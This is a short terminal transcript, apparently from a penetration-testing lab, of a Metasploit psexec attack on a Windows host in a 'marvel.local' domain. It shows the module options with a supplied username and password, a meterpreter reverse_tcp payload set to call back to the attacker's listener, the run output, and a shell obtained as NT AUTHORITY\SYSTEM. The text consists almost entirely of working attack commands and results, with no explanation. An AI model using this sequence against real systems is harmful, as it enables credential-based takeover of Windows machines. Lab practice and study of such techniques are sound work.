Metasploit
> msfconsole
use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.164.141  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             DOMAIN.local     no        The Windows domain to use for authentication
   SMBPass               pass_123         no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               user             no        The username to authenticate as

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.164.137  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.164.137:4444
[*] 192.168.164.141:445 - Connecting to the server...
[*] 192.168.164.141:445 - Authenticating to 192.168.164.141:445|marvel.local as user 'user'...
[*] 192.168.164.141:445 - Selecting PowerShell target
[*] 192.168.164.141:445 - Executing the payload...
[+] 192.168.164.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200262 bytes) to 192.168.164.141
[*] Meterpreter session 1 opened (192.168.164.137:4444 -> 192.168.164.141:58863 ) at 2022-01-12 22:38:10 +0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM